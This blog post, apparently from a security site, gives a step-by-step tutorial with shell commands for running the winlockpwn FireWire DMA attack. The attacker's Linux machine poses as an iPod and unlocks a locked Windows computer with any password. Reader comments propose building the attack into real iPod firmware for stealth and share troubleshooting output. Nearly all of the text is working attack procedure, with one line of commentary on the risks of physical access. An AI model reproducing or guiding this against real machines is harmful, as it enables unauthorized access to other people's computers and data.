sudo aptitude install libdc1394-13 libraw1394-dev swig pythonNow we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make installThe next step is to modify libraw1394:
sudo vim /usr/include/libraw1394/raw1394.hAt this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don't forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.
wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gzAnd of course, we need to untar it
tar -zxvf pythonraw1394-1.0.tar.gzNow we need to go into the untared directory and download the actual winlockpwn script:
cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwnThe winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:
chmod +x winlockpwnNow we also need to edit the Makefile for pythonraw1394 to point it to python 2.3's include directory:
sudo vim MakefileNow change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:
sudo makeThe raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:
sudo modprobe raw1394
sudo chmod 666 /dev/raw1394Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:
sudo vim romtoolChange #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.
./romtool -s 0 ipod.csrLoading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:
winlockpwn port node targetMine looked like this:
./winlockpwn 0 1 1Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.
There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO's office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.
---
Danny Howerton
http://metacortexsecurity.com
6 comments:
Great write up. I'm really interested in all the physical memory stuff that's been buzzing around lately. I've no idea if this is possible or if it would all fit, but what would make this really cool would be if someone could write it all in to a real iPod's firmware instead of just fooling windows into thinking a laptop is an iPod. Casually plugging in your iPod to a machine would look much less suspicious.
I have been discussing the same thing with some of my work buddies and I definitly agree. I imagine it wouldnt be that hard granted you load linux on the ipod. Now, I dont own an ipod so I am not able to try that out. If anyone would be willing to donate one, I would be more than happy to play with it a little.
Great article. Thanks for taking the time to explain every step so clearly.
Thks for the tut dude.
I running into the following problems:
1. When I run "./romtool -s 0 ipod.csr" the output seems fine, but dmesg says "hpsb_update_config_rom() is deprecated" and "ieee1394: Failed to generate Configuration ROM image for host 0"
2. I get an "Errno 22, Invalid Argument" error when using "./winlockpwn 0 1 1" (see line 446 of firewire.py).
I've tried different cables without success. I'm able to use "./romtool -o 0 0 othernode.csr" without problem though.
Could you help me ?
I have same problem.
I get an "Errno 22, Invalid Argument" error when using "
File "./winlockpwn", line 163, in ?
mem = n.read(offset + so , len(pattern))
File "/home/shad0w/Pulpit/instalki/pythonraw1394/firewire.py", line 715, in read
or
File "/home/shad0w/Pulpit/instalki/pythonraw1394/firewire.py", line 314, in __getitem_
on diffrent node
I have this on every computers what i have
Just so you know, I am a newbie at this stuff so please bare with me.
I followed the tutorial to the letter but when I got to the (sudo make) command in pythonraw1394, I got this output:
mario@Tahboo:~/pythonraw1394$ sudo make
[sudo] password for mario:
cc -Wall -shared -fPIC -I/usr/local/include/python2.3 -I/usr/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so
In file included from raw1394_wrap.c:2505:
/usr/include/libraw1394/raw1394.h:1216:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1230:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1242:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1272:2: error: invalid preprocessing directive #__attribute__
/usr/include/libraw1394/raw1394.h:1283:2: error: invalid preprocessing directive #__attribute__
make: *** [_raw1394.so] Error 1
Please could you tell me what I am missing. Thanx
Mario
Post a Comment